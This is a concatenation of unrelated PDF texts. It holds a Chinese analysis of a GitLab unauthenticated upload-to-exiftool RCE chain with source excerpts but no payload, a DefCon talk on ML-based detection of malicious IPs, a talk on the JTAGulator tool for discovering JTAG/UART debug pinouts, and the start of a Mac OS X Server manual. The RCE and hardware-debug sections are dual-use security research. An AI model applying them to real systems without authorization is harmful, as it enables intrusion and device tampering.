图⽚类型的⽂件是 ⽆ Ruby 复制代码 class UploadsController < ApplicationController skip_before_action :authenticate_user! skip_before_action :check_two_factor_requirement, only: [:show] before_action :upload_mount_satisfied? before_action :authorize_access!, only: [:show] before_action :authorize_create_access!, only: [:create, :authorize] before_action :verify_workhorse_api!, only: [:authorize] def authorize_create_access! return unless model authorized = case model when User can?(current_user, :update_user, model) else can?(current_user, :create_note, model) end render_unauthorized unless authorized end 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 Ruby 复制代码 # 这个 uploads controller 不需要 登陆! skip_before_action :authenticate_user! # 对于 create action 或者 authorize action,在调⽤前会调⽤ authorize_create_access before_action :authorize_create_access!, only: [:create, :authorize] # 对于 authorize action,在调⽤前会调⽤ verify_workhorse_api before_action :verify_workhorse_api!, only: [:authorize] # 1 2 3 4 5 6 7 8 16 需授权即可上传。 在未修复前,左边是未修复,右边是打上补丁了。 简要调⽤链如下 Ruby 复制代码 uploads_controller: authorize_create_access > return unless model uploads_actions: model > strong_memoize(:model) { find_model } uploads_controller: find_model > return unless params[:id] 1 2 3 17 ⽽ 参数中并没有带上 id ,因此 会⼀路直接 return 掉,并去调⽤了对应的 action 18 因此这个过程中并没有发⽣错误 = =,回到前⾯ api.go 中的 PreAuthorizeHandler 中,这⾥摘录如下 gitlab-workhorse 中的api.go 在完成了 对 /user/uploads/authorize 的请求后, rail-web 中的 upload_contraoller 执⾏ render 返 回数据, gitlab-workhorse 获取返回的 信息并设置authResponse。 next 值如下,其中包含了 HandleFileUpload 也即处理 exif 图⽚ 调⽤ exiftool 的触发点 Go 复制代码 func (api *API) PreAuthorizeHandler(next HandleFunc, suffix string) http.Handler { return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { httpResponse, authResponse, err := api.PreAuthorize(suffix, r) if httpResponse != nil { defer httpResponse.Body.Close() } if err != nil { helper.Fail500(w, r, err) return } // The response couldn't be interpreted as a valid auth response, so // pass it back (mostly) unmodified if httpResponse != nil && authResponse == nil { passResponseBack(httpResponse, w, r) return } httpResponse.Body.Close() // Free up the Puma thread copyAuthHeader(httpResponse, w) next(w, r, authResponse) }) } 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 19 从⽽完成了整条RCE链路的调⽤。 因此在实际遇到的场景中,POST upload/users 接⼝会返回 404 时因为 代码⾥包含了9⽉的 commit,如果发现 id 没有传⼊,那么就直接 raise 错误,不进⾏下⼀步操作。 Go 复制代码 next => func(w http.ResponseWriter, r *http.Request, a *api.Response) { s := &SavedFileTracker{Request: r} opts, _, err := p.Prepare(a) if err != nil { helper.Fail500(w, r, fmt.Errorf("Accelerate: error preparing file storage options")) return } HandleFileUploads(w, r, h, a, s, opts) }, 1 2 3 4 5 6 7 8 9 10 11 20 关于 csrf, 因为 API 请求被发到了后端的 Rails-web, 本身就有 csrf保护, 在 lib/gitlab/request_forgery_protection.rb:7 对于 绝⼤部分的请求,默认都是要有 CSRF保护的。所以 对于⼀开始流传的POC⽽⾔,第⼀步⾃然是访问主⻚获取到 gitlab_session_ 和 X-CSRF- Token 的值。 21 这部分就只放个⼈星球了,感谢阅读 。 https://public.zsxq.com/groups/555848225184.html 3、扩展利⽤
pdf
Defending Networks with Incomplete Information: A Machine Learning Approach Alexandre Pinto alexcp@mlsecproject.org @alexcpsec @MLSecProject • This is a talk about DEFENDING not attacking – NO systems were harmed on the development of this talk. – We are actually trying to BUILD something here. • This talk includes more MATH than the daily recommended intake by the FDA. • You have been warned... ** WARNING ** • 12 years in Information Security, done a little bit of everything. • Past 7 or so years leading security consultancy and monitoring teams in Brazil, London and the US. – If there is any way a SIEM can hurt you, it did to me. • Researching machine learning and data science in general for the past year or so. Participates in Kaggle machine learning competitions (for fun, not for profit). • First presentation at DefCon! (where is my shot?) Who’s this guy? • Security Monitoring: We are doing it wrong • Machine Learning and the Robot Uprising • Data gathering for InfoSec • Case study: Model to detect malicious activity from log data • MLSec Project • Attacks and Adversaries • Future Direction Agenda • Logs, logs everywhere The Monitoring Problem • Logs, logs everywhere The Monitoring Problem • SANS Eighth Annual 2012 Log and Event Management Survey Results (http:// www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Are these the right tools for the job? • SANS Eighth Annual 2012 Log and Event Management Survey Results (http:// www.sans.org/reading_room/analysts_program/SortingThruNoise.pdf) Are these the right tools for the job? • Rules in a SIEM solution invariably are: – “Something” has happened “x” times; – “Something” has happened and other “something2” has happened, with some relationship (time, same fields, etc) between them. • Configuring SIEM = iterate on combinations until: – Customer or management is fooled satisfied; or – Consulting money runs out • Behavioral rules (anomaly detection) helps a bit with the “x”s, but still, very laborious and time consuming. Correlation Rules: a Primer • However, there are individuals who will do a good job • How many do you know? • DAM hard (ouch!) to find these capable professionals Not exclusively a tool problem • How many of these very qualified professionals will we need? • How many know/ will learn statistics, data analysis, data science? Next up: Big Data Technologies We need an Army! Of ROBOTS! • “Machine learning systems automatically learn programs from data” (*) • You don’t really code the program, but it is inferred from data. • Intuition of trying to mimic the way the brain learns: that’s where terms like “artificial intelligence” come from. Enter Machine Learning (*) CACM 55(10) - A Few Useful Things to Know about Machine Learning • Sales Applications of Machine Learning • Trading • Image and Voice Recognition Security Applications of ML • Fraud detection systems: – Is what he just did consistent with past behavior? • Network anomaly detection (?): – NOPE! – More like statistical analysis, bad one at that • SPAM filters - Remember the “Bayesian filters”? There you go. - How many talks have you been hearing about SPAM filtering lately? ;) • Supervised Learning: – Classification (NN, SVM, Naïve Bayes) – Regression (linear, logistic) Kinds of Machine Learning Source – scikit-learn.github.io/scikit-learn-tutorial/ • Unsupervised Learning : – Clustering (k-means) – Decomposition (PCA, SVD) Considerations on Data Gathering • “I’ve got 99 problems, but data ain’t one” • Models will (generally) get better with more data – We always have to consider bias and variance as we select our data points – Also adversaries – we may be force-fed “bad data”, find signal in weird noise or design bad (or exploitable) features Domingos, 2012 Abu-Mostafa, Caltech, 2012 Considerations on Data Gathering • Adversaries - Exploiting the learning process • Understand the model, understand the machine, and you can circumvent it • Something InfoSec community knows very well • Any predictive model on InfoSec will be pushed to the limit • Again, think back on the way SPAM engines evolved. Designing a model to detect external agents with malicious behavior • We’ve got all that log data anyway, let’s dig into it • Most important (and time consuming) thing is the “feature engineering” • We are going to go through one of the algorithms I have put together as part of my research Model: Data Collection • Firewall block data from SANS DShield (per day) • Firewalls, really? Yes, but could be anything. • We get summarized “malicious” data per port • Number of aggregated events (orange) • Number of log entries before aggregation (purple) Model Intuition: Proximity • Assumptions to aggregate the data • Correlation / proximity / similarity BY BEHAVIOR • “Bad Neighborhoods” concept: – Spamhaus x CyberBunker – Google Report (June 2013) – Moura 2013 • Group by Netblock (/16, /24) • Group by ASN – (thanks, Team Cymru) Map of the Internet (Hilbert Curve) Block port 22 2013-07-20 Notice the clustering behaviour? 0 10 127 MULTICAST AND FRIENDS You are Here Map of the Internet (Hilbert Curve) Block port 22 2013-07-20 Notice the clustering behaviour? 0 10 127 MULTICAST AND FRIENDS CN RU CN, BR, TH You are Here Be careful with confirmation bias Country codes are not enough for any prediction power of consequence today Model Intuition: Temporal Decay • Even bad neighborhoods renovate: – Atackers may change ISPs/proxies – Botnets may be shut down / relocate – A little paranoia is Ok, but not EVERYONE is out to get you (at least not all at once) • As days pass, let’s forget, bit by bit, who attacked • A Half-Life decay function will do just fine Model Intuition: Temporal Decay Model: Calculate Features • Cluster your data: what behavior are you trying to predict? • Create “Badness” Rank = lwRank (just because) • Calculate normalized ranks by IP, Netblock (16, 24) and ASN • Missing ASNs and Bogons (we still have those) handled separately, get higher ranks. Model: Calculate Features • We will have a rank calculation per day: – Each “day-rank” will accumulate all the knowledge we gathered on that IP, Netblock and ASN to that day – Decay previous “day-rank” and add today’s results • Training data usually spans multiple days • Each entry will have its date: – Use that “day-rank” – NO cheating ---------> – Survivorship bias issues! Model: Example Feature (1) • Block on Port 3389 (IP address only) – Horizontal axis: lwRank from 0 (good/neutral) to 1 (very bad) – Vertical axis: log10(number of IPs in model) Model: Example Feature (2) • Block on Port 22 (IP address only) – Horizontal axis: lwRank from 0 (good/neutral) to 1 (very bad) – Vertical axis: log10(number of IPs in model) How are we doing so far? Training the Model • YAY! We have a bunch of numbers per IP address! • We get the latest blocked log files (SANS or not): – We have “badness” data on IP Addresses - features – If they were blocked, they are “malicious” - label • Now, for each behavior to predict: – Create a dataset with “enough” observations: – Rule of Thumb: 70k - 120k is good because of empirical dimensionality. Negative and Positive Observations • We also require “non-malicious” IPs! • If we just feed the algorithms with one label, they will get lazy. • CHEAP TRICK: Everything is “malicious” - trivial solution • Gather “non-malicious” IP addresses from Alexa and Chromium Top 1m Sites. SVM FTW! • Use your favorite algorithm! YMMV. • I chose Support Vector Machines (SVM): – Good for classification problems with numeric features – Not a lot of features, so it helps control overfitting, built in regularization in the model, usually robust – Also awesome: hyperplane separation on an unknown infinite dimension. Jesse Johnson – shapeofdata.wordpress.com No idea… Everyone copies this one Results: Training/Test Data • Model is trained on each behavior for each day • Training accuracy* (cross-validation): 83 to 95% • New data - test accuracy*: – Training model on day D, predicting behavior in day D+1 – 79 to 95%, roughly increasing over time (*)Accuracy = (things we got right) / (everything we tried) Results: Training/Test Data Results: Training/Test Data Results: New Data • How does that help? • With new data we can verify the labels, we find: – 70 – 92% true positive rate (sensitivity/precision) – 95 – 99% true negative rate (specificity/recall) • This means that (odds likelihood calculation): – If the model says something is “bad”, it is 13.6 to 18.5 times MORE LIKELY to be bad. • Think about this. • Wouldn’t you rather have your analysts look at these first? Remember the Hilbert Curve? • Behavior: block on port 22 • Trial inference on 100k IP addresses per Class A subnet • Logarithm scale: brightest tiles are 10 to 1000 times more likely to attack. Remember the Hilbert Curve? • Behavior: block on port 22 • Trial inference on 100k IP addresses per Class A subnet • Logarithm scale: brightest tiles are 10 to 1000 times more likely to attack. Attacks and Adversaries • IP addresses are not as reliable as they could be: – Forget about UDP – Lowest possible value for DFIR • This is not attribution, this is defense • Challenges: – Anonymous proxies (not really, same rules apply) – Tor (less clustering behavior on exit nodes) – Fast-flux Tor - 15~30 mins • Process was designed with different actors in mind as well, given they can be clustered in some way. Future Direction • As is, the results from the predictions can help Security Analysts on tiers 1 and 2 of SOCs: – You can’t “eyeball” all of the data. – Makes the deluge of logs produce something actionable • The real kicker is when we compose algorithms (ensemble): – Web server -> go through firewall, then IPS, then WAF – Increased precision by composing different behaviors • Given enough predictive power (increased likelihood): – Implement an SDN system that sends detected attackers through a “longer path” or to a Honeynet – Connection could be blocked immediately Final Remarks • Sign up, send logs, receive reports generated by machine learning models! – FREE! I need the data! Please help! ;) • Looking for contributors, ideas, skeptics to support project as well. • Please visit https://www.mlsecproject.org , message @MLSecProject or just e-mail me. • Machine learning can assist monitoring teams in data- intensive activities (like SIEM and security tool monitoring) • The odds likelihood ratio (12x to 18x) is proportional do the gain in efficiency on the monitoring teams. • This is just the beginning! Lots of potential! • MLSec Project is cool, check it out and sign up! Take Aways Thanks! • Q&A? • Don’t forget to submit feedback! Alexandre Pinto alexcp@mlsecproject.org @alexcpsec @MLSecProject "Prediction is very difficult, especially if it's about the future." - Niels Bohr
pdf
Assisted Discovery of On-Chip Debug Interfaces Joe Grand (@joegrand) Introduction • On-chip debug interfaces are a well-known attack vector - Can provide chip-level control of a target device - Extract program code or data - Modify memory contents - Affect device operation on-the-fly - Gain insight into system operation • Inconvenient for vendor to remove functionality - Would prevent capability for legitimate personnel - Weak obfuscation instead (hidden or unmarked signals/connectors) - May be password protected (if supported by device) Introduction 2 • Identifying OCD interfaces can sometimes be difficult and/or time consuming Goals • Create an easy-to-use tool to simplify the process • Attract non-HW folks to HW hacking • Hunz's JTAG Finder - http://elinux.org/JTAG_Finder • JTAGenum & RS232enum - http://deadhacker.com/tools/ • Cyber Fast Track - www.cft.usma.edu Inspiration Other Art • An Open JTAG Debugger (GoodFET), Travis Goodspeed, DEFCON 17 - http://defcon.org/html/links/dc-archives/dc-17- archive.html#Goodspeed2 • Blackbox JTAG Reverse Engineering, Felix Domke, 26C3 - http://events.ccc.de/congress/2009/Fahrplan/ attachments/1435_JTAG.pdf Other Art 2 • Forensic Imaging of Embedded Systems using JTAG, Marcel Breeuwsma (NFI), Digital Investigation Journal, March 2006 - http://www.sciencedirect.com/science/article/pii/ S174228760600003X Identifying Interfaces: External • Accessible to the outside world - Intended for engineers or manufacturers - Device programming or final system test • Usually hidden or protected - Underneath batteries - Behind stickers/covers • May be a proprietary/non-standard connector Identifying Interfaces: Internal • Test points or unpopulated pads • Silkscreen markings or notation • Easy-to-access locations Identifying Interfaces: Internal 2 • Familiar target or based on common pinouts - Often single- or double-row footprint - JTAG: www.jtagtest.com/pinouts/ ← www.blackhat.com/html/bh-us-10/bh-us-10-archives.html#Jack → www.nostarch.com/xboxfree Identifying Interfaces: Internal 3 • Can use PCB/design heuristics - Traces of similar function are grouped together (bus) - Array of pull-up/pull-down resistors (to set static state of pins) - Test points usually placed on important/interesting signals ← http://elinux.org/images/d/d6/Jtag.pdf Identifying Interfaces: Internal 4 • More difficult to locate when available only on component pads or tented vias *** www.dd-wrt.com/wiki/index.php/JTAG_pinouts#Buffalo_WLA-G54C Determining Pin Function • Identify test points/connector & target device • Trace connections - Visually or w/ multimeter in continuity mode - For devices where pins aren't accessible (BGA), remove device or use X-ray - Use data sheet to match pin number to function • Probe connections - Use oscilloscope or logic analyzer - Pull pins high or low, observe results, repeat - Logic state or number of pins can help to make educated guesses On-Chip Debug Interfaces • JTAG • UART JTAG • Industry-standard interface (IEEE 1149.1) - Created for chip- and system-level testing - Defines low-level functionality of finite state machine/ Test Access Port (TAP) - http://en.wikipedia.org/wiki/Joint_Test_Action_Group • Provides a direct interface to hardware - Can "hijack" all pins on the device (Boundary scan/ test) - Can access other devices connected to target chip - Programming/debug interface (access to Flash, RAM) - Vendor-defined functions/test modes might be available JTAG 2 • Multiple devices can be "chained" together for communication to all via a single JTAG port - Even multiple dies within the same chip package - Different vendors may not play well together • Development environments abstract low-level functionality from the user - Implementations are device- or family-specific - As long as we can locate the interface/pinout, let other tools do the rest JTAG: Architecture • Synchronous serial interface → TDI = Data In (to target device) ← TDO = Data Out (from target device) → TMS = Test Mode Select → TCK = Test Clock → /TRST = Test Reset (optional for async reset) • Test Access Port (TAP) w/ Shift Registers - Instruction (>= 2 bit wide) - Data - Bypass (1 bit) - Boundary Scan (variable) - Device ID (32 bit) (optional) JTAG: TAP Controller *** State transitions occur on rising edge of TCK based on current state and value of TMS *** TAP provides 4 major operations: Reset, Run-Test, Scan DR, Scan IR *** Can move to Reset state from any other state w/ TMS high for 5x TCK *** 3 primary steps in Scan: Capture, Shift, Update *** Data held in "shadow" latch until Update state JTAG: Instructions ┌───────────┬─────────────┬──────────┬───────────────────────────────────────────────────────────────────────┐ │ Name │ Required? │ Opcode │ Description │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ BYPASS │ Y │ All 1s │ Bypass on-chip system logic. Allows serial data to be transferred │ │ │ │ │ from TDI to TDO without affecting operation of the IC. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ SAMPRE │ Y │ Varies │ Used for controlling (preload) or observing (sample) the signals at │ │ │ │ │ device pins. Enables the boundary scan register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ EXTEST │ Y │ All 0s │ Places the IC in external boundary test mode. Used to test device │ │ │ │ │ interconnections. Enables the boundary scan register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ INTEST │ N │ Varies │ Used for static testing of internal device logic in a single-step │ │ │ │ │ mode. Enables the boundary scan register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ RUNBIST │ N │ Varies │ Places the IC in a self-test mode and selects a user-specified data │ │ │ │ │ register to be enabled. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ CLAMP │ N │ Varies │ Sets the IC outputs to logic levels as defined in the boundary scan │ │ │ │ │ register. Enables the bypass register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ HIGHZ │ N │ Varies │ Sets all IC outputs to a disabled (high impedance) state. Enables │ │ │ │ │ the bypass register. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ IDCODE │ N │ Varies │ Enables the 32-bit device identification register. Does not affect │ │ │ │ │ operation of the IC. │ ├───────────┼─────────────┼──────────┼───────────────────────────────────────────────────────────────────────┤ │ USERCODE │ N │ Varies │ Places user-defined information into the 32-bit device │ │ │ │ │ identification register. Does not affect operation of the IC. │ └───────────┴─────────────┴──────────┴───────────────────────────────────────────────────────────────────────┘ JTAG: Protection • Implementation specific • Security fuse physically blown prior to release - Could be repaired w/ silicon die attack • Password required to enable functionality - Ex.: Flash erased after n attempts (so perform n-1), then reset and continue • May allow BYPASS, but prevent higher level functionality - Ex.: TI MSP430 JTAG: HW Tools • RIFF Box - www.jtagbox.com • H-JTAG - www.hjtag.com/en/ • Bus Blaster (open source) - http://dangerousprototypes.com/docs/Bus_Blaster • Wiggler or compatible (parallel port) - ftp://www.keith-koep.com/pub/arm-tools/jtag/ jtag05_sch.pdf JTAG: SW Tools • OpenOCD (Open On-Chip Debugger) - http://openocd.sourceforge.net • UrJTAG (Universal JTAG Library) - www.urjtag.org UART • Universal Asynchronous Receiver/Transmitter - No external clock needed - Data bits sent LSB first (D0) - NRZ (Non-Return-To-Zero) coding - Transfer speed (bits/second) = 1 / bit width - http://en.wikipedia.org/wiki/Asynchronous_serial_ communication *** Start bit + Data bits + Parity (optional) + Stop bit(s) UART 2 • Asynchronous serial interface → TXD = Transmit data (to target device) ← RXD = Receive data (from target device) ↔ DTR, DSR, RTS, CTS, RI, DCD = Control signals (uncommon for modern implementations) • Many embedded systems use UART as debug output/console UART 3 Bit width = ~8.7uS Mark (Idle) Space Hardware Design Requirements • Open source/hackable/expandable • Simple command-based interface • Proper input protection • Adjustable target voltage • Off-the-shelf components • Hand solderable (if desired) Block Diagram MCU Parallax Propeller EEPROM 24LC512 2 (I2C) Power Switch MIC2025-2YM LDO LD1117S33TR USB 5V 3.3V D/A AD8655 1.2V - 3.3V ~13mV/step Serial-to-USB FT232RL 2 1 (PWM) Host PC USB Mini-B Voltage Level Translator TXS0108EPWR Voltage Level Translator TXS0108EPWR Voltage Level Translator TXS0108EPWR Input Protection Circuitry 24 Target Device 1 Status Indicator WP59EGW PCB *** 2x5 headers compatible w/ Bus Pirate probes, http://dangerousprototypes.com/docs/Bus_Pirate Target I/F (24 channels) Propeller USB Input protection Level translation Status Op-Amp/DAC *** INFORMATION: www.parallax.com/propeller/ *** DISCUSSION FORUMS: http://forums.parallax.com *** OBJECT EXCHANGE: http://obex.parallax.com • Completely custom, ground up design • 8 independent cogs @ 20 MIPS each • Code in Spin, ASM, or C • Used in DEFCON XX Badge Propeller/Core • Clock: DC to 128MHz (80MHz recommended) • Global (hub) memory: 32KB RAM, 32KB ROM • Cog memory: 2KB RAM each • GPIO: 32 @ 40mA sink/source per pin • Program code loaded from external EEPROM on power-up Propeller/Core 2 Propeller/Core 3 • Standard development using Propeller Tool & Parallax Serial Terminal (Windows) • Programmable via serial interface (usually in conjunction w/ USB-to-serial IC) Propeller/Core 4 USB Interface • Allows for Propeller programming & UI • Powers JTAGulator from bus (5V) • FT232RL USB-to-Serial UART - Entire USB protocol handled on-chip - Host will recognize as a virtual serial port (Windows, OS X, Linux) • MIC2025 Power Distribution Switch - Internal current limiting, thermal shutdown - Let the FT232 enumerate first (@ < 100mA), then enable system load Adjustable Target Voltage • PWM from Propeller - Duty cycle corresponds to output voltage (VADJ) - Look-up table for values in 0.1V increments • AD8655 Low Noise, Precision CMOS Amplifier - Single supply, rail-to-rail - 220mA output current (~150mA @ Vo = 1.2V-3.3V) - Voltage follower configuration to serve as DAC buffer Level Translation • Allows 3.3V signals from Propeller to be converted to VADJ (1.2V-3.3V) • Prevents potential damage due to over-voltage on target device's unknown connections • TXS0108E Bidirectional Voltage-Level Translator - Designed for both open drain and push-pull interfaces - Internal pull-up resistors (40kΩ when driving low, 4kΩ when high) - Automatic signal direction detection - High-Z outputs when OE low -> will not interfere with target when not in use Input Protection • Prevent high voltages/spikes on unknown pins from damaging JTAGulator • Diode limiter clamps input if needed • Vf must be < 0.5V to protect TXS0108Es Bill-of-Materials • All components from Digi-Key • Total cost per unit = $50.73 JTAGulator JTAGulator Bill-of-Materials Bill-of-Materials Bill-of-Materials HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 HW B, Document 1.0, April 19, 2013 Item Quantity Reference Manufacturer Manuf. Part # Distributor Distrib. Part # Description 1 2 C1, C2 Kemet C1206C103K5RACTU Digi-Key 399-1234-1-ND Capacitor, 0.01uF ceramic, 10%, 50V, X7R, 1206 2 14 C3, C6, C9, C11, C12, C13, C14, C15, C17, C18, C19, C20, C21, C22 Kemet C1206C104K5RACTU Digi-Key 399-1249-1-ND Capacitor, 0.1uF ceramic, 10%, 50V, X7R, 1206 3 1 C4 Yageo CC1206KRX7R9BB102 Digi-Key 311-1170-1-ND Capacitor, 1000pF ceramic, 10%, 50V, X7R, 1206 4 1 C5 Yageo CC1206KRX7R9BB471 Digi-Key 311-1167-1-ND Capacitor, 470pF ceramic, 10%, 50V, X7R, 1206 5 1 C7 Kemet T491A106M016AS Digi-Key 399-3687-1-ND Capacitor, 10uF tantalum, 20%, 16V, size A 6 2 C8, C10 Kemet T491A475K016AT Digi-Key 399-3697-1-ND Capacitor, 4.7uF tantalum, 10%, 16V, size A 7 1 D1 Kingbright WP59EGW Digi-Key 754-1232-ND LED, Red/Green Bi-Color, T-1 3/4 (5mm) 8 1 L1 TDK MPZ2012S221A Digi-Key 445-1568-1-ND Inductor, Ferrite Bead, 220R@100MHz, 3A, 0805 9 1 P1 Hirose Electric UX60-MB-5S8 Digi-Key H2960CT-ND Connector, Mini-USB, 5-pin, SMT w/ PCB mount 10 5 P2, P3, P4, P5, P6 TE Connectivity 282834-5 Digi-Key A98336-ND Connector, Terminal Block, 5-pin, side entry, 0.1” P 11 3 P7, P8, P9 3M 961210-6404-AR Digi-Key 3M9460-ND Header, Dual row, Vertical header, 2x5-pin, 0.1” P 12 1 Q1 Fairchild MMBT3904 Digi-Key MMBT3904FSCT-ND Transistor, NPN, 40V, 200mA, SOT23-3 13 5 R1, R2, R3, R4, R10 Any Any Digi-Key P10KECT-ND Resistor, 10k, 5%, 1/4W, 1206 14 1 R5 Any Any Digi-Key P470ECT-ND Resistor, 470 ohm, 5%, 1/4W, 1206 15 1 R6 Any Any Digi-Key P270ECT-ND Resistor, 270 ohm, 5%, 1/4W, 1206 16 1 R7 Any Any Digi-Key P18.0KFCT-ND Resistor, 18k, 1%, 1/4W, 1206 17 1 R8 Any Any Digi-Key P8.20KFCT-ND Resistor, 8.2k, 1%, 1/4W, 1206 18 1 R9 Any Any Digi-Key P100KECT-ND Resistor, 100k, 5%, 1/4W, 1206 19 3 R11, R12, R13 Bourns 4816P-1-102LF Digi-Key 4816P-1-102LFCT-ND Resistor, Array, 8 isolated, 1k, 2%, 1/6W, SOIC16 20 1 SW1 C&K KSC201JLFS Digi-Key 401-1756-1-ND Switch, SPST, Momentary, 120gf, 6.2 x 6.2mm, J-Lead 21 1 U1 FTDI FT232RL-REEL Digi-Key 768-1007-1-ND IC, USB-to-UART Bridge, SSOP28 22 1 U2 Parallax P8X32A-Q44 Digi-Key P8X32A-Q44-ND IC, Microcontroller, Propeller, LQFP44 23 1 U3 Micrel MIC2025-2YM Digi-Key 576-1058-ND IC, Power Distribution Switch, Single-channel, SOIC8 24 1 U4 Microchip 24LC512-I/SN Digi-Key 24LC512-I/SN-ND IC, Memory, Serial EEPROM, 64KB, SOIC8 25 1 U5 Analog Devices AD8655ARZ Digi-Key AD8655ARZ-ND IC, Op. Amp., CMOS, Rail-to-rail, 220mA Iout, SOIC8 26 1 U6 ST Microelectronics LD1117S33CTR Digi-Key 497-1241-1-ND IC, Voltage Regulator, LDO, 3.3V@800mA, SOT223 27 6 U7, U8, U10, U11, U13, U14 ON Semiconductor NUP4302MR6T1G Digi-Key NUP4302MR6T1GOSCT-ND IC, Schottky Diode Array, 4 channel, TSOP6 28 3 U9, U12, U15 Texas Instruments TXS0108EPWR Digi-Key 296-23011-1-ND IC, Level Translator, Bi-directional, TSSOP20 29 1 Y1 ECS ECS-50-18-4XEN Digi-Key XC1738-ND Crystal, 5.0MHz, 18pF, HC49/US 30 1 PCB Any JTAG B N/A N/A PCB, Fabrication Firmware Source Tree General Commands • Set target system voltage (V) (1.2V-3.3V) • Read all channels (R) • Write all channels (W) • Print available commands (H) JTAG Commands • Identify JTAG pinout via IDCODE scan (I) • Identify JTAG pinout via BYPASS scan (B) • Get Device IDs (D) (w/ known pinout) • Test BYPASS (T) (w/ known pinout) IDCODE Scan • 32-bit Device ID (if available) is in the DR on TAP reset or IC power-up - Otherwise, TAP will reset to BYPASS (LSB = 0) - Can simply enter Shift-DR state and clock out on TDO - TDI not required/used during IDCODE acquisition LSB IDCODE Scan 2 • Device ID values vary with part/family/vendor - Locate in data sheets, BSDL files, reference code, etc. • Manufacturer ID provided by JEDEC - Each manufacturer assigned a unique identifier - Can use to help validate that proper IDCODE was retrieved - http://www.jedec.org/standards-documents/ results/jep106 IDCODE Scan 3 • Ask user for number of channels to use • For every possible pin permutation (except TDI) - Set unused channels to output high (in case of any active low reset pins) - Configure JTAG pins to use on the Propeller - Reset the TAP - Try to get the Device ID by reading the DR - If Device ID is 0xFFFFFFFF or if bit 0 != 1, ignore - Otherwise, display potentially valid JTAG pinout BYPASS Scan • In BYPASS, data shifted into TDI is received on TDO delayed by one clock cycle BYPASS Scan 2 • Can determine how many devices (if any) are in the chain via "blind interrogation" - Force device(s) into BYPASS (IR of all 1s) - Send 1s to fill DRs - Send a 0 and count until it is output on TDO BYPASS Scan 3 • Ask user for number of channels to use • For every possible pin permutation - Set unused channels to output high (in case of any active low reset pins) - Configure JTAG pins to use on the Propeller - Reset the TAP - Perform blind interrogation - If number of detected devices > 0, display potentially valid JTAG pinout DEFCON 17 Badge • Freescale MC56F8006 Digital Signal Controller - ID = 0x01C0601D - www.bsdl.info/details.htm?sid=e82c74686c7522e 888ca59b002289d77 MSB LSB ┌───────┬───────────────┬─────────────┬─────────────────┬─────────────────┬───────┐ │ Ver. │ Design Center │ Core Number | Chip Derivative | Manufacturer ID │ Fixed │ └───────┴───────────────┴─────────────┴─────────────────┴─────────────────┴───────┘ 31...28 27...22 21...17 16...12 11...1 0 0000 000111 00000 (DSP56300) 00110 00000001110 (0x0E) 1 UART Commands • Identify UART pinout (U) • UART pass through (P) (w/ known pinout) UART Scan • Ask user for desired output string (up to 16 bytes) • Ask user for number of channels to use • For every possible pin permutation - Configure UART pins to use on the Propeller - Set baud rate - Send user string - Wait to receive data (20ms maximum per byte) - If any bytes received, display potentially valid UART pinout and data (up to 16 bytes) UART Scan 2 • 8 data bits, no parity, 1 stop bit (8N1) • Baud rates stored in look-up table - 75, 110, 150, 300, 900, 1200, 1800, 2400, 3600, 4800, 7200, 9600, 14400, 19200, 28800, 31250, 38400, 57600, 76800, 115200, 153600, 230400, 250000, 307200 Linksys WRT54G v2 rXH (w/ DD-WRT) • Broadcom BCM4712 - ID = 0x1471217F - https://github.com/notch/tjtag/blob/master/tjtag.c - UART: JP1 (TXD = 4, RXD = 6) @ 115200, 8N1 *** www.jtagtest.com/pinouts/wrt54 Scan Timing # of Channels IDCODE Permutations IDCODE (mm:ss) BYPASS Permutations BYPASS (mm:ss) 4 24 < 00:01 24 00:02 8 336 00:02 1680 02:05 16 3360 00:13 43680 54:27 24 12144 00:46 255024 317:54 • IDCODE - TDI ignored since we're only shifting data out of DR - ~264 permutations/second • BYPASS - Many bits/permutation needed to account for multiple devices in chain and varying IR lengths - ~13.37 permutations/second Scan Timing 2 # of Channels UART Permutations Time (mm:ss) 4 12 00:12 8 56 00:57 16 240 4:04 24 552 9:22 • UART - Only need to locate two pins (TXD/RXD) - 24 baud rates/permutation - ~1 permutation/second Demonstration Possible Limitations • Could cause target to behave abnormally due to "fuzzing" unknown pins • OCD interface isn't being properly enabled - Non-standard configuration - Password protected - System expects defined reset sequence or pin setting • OCD interface is physically disconnected - Cut traces, missing jumpers/0 ohm resistors • No OCD interface exists *** Additional reverse engineering will be necessary to determine the problem or discover pinout Future Work • Add support for other interfaces - TI Spy-Bi-Wire, ARM Serial Wire Debug, Microchip ICSP, Atmel AVR ISP Other Uses • Propeller development board • Logic analyzer • Inter-chip communication/probing ala Bus Pirate or GoodFET • ??? Get It • www.jtagulator.com *** Schematics, firmware, BOM, block diagram, Gerber plots, photos, other engineering documentation • www.parallax.com *** Assembled units, bare boards, accessories A Poem The End.
pdf
Mac OS X Server Command-Line Administration For Version 10.3 or Later 034-2454_Cvr 10/15/03 11:47 AM Page 1  Apple Computer, Inc. © 2003 Apple Computer, Inc. All rights reserved. The owner or authorized user of a valid copy of Mac OS X Server software may reproduce this publication for the purpose of learning to use such software. No part of this publication may be reproduced or transmitted for commercial purposes, such as selling copies of this publication or for providing paid for support services. The Apple logo is a trademark of Apple Computer, Inc., registered in the U.S. and other countries. Use of the “keyboard” Apple logo (Option-Shift-K) for commercial purposes without the prior written consent of Apple may constitute trademark infringement and unfair competition in violation of federal and state laws. Apple, the Apple logo, AirPort, AppleScript, AppleShare, AppleTalk, ColorSync, FireWire, iMac, Keychain, Mac, Macintosh, Power Mac, Power Macintosh, QuickTime, Sherlock, and WebObjects are trademarks of Apple Computer, Inc., registered in the U.S. and other countries. Extensions Manager and Finder are 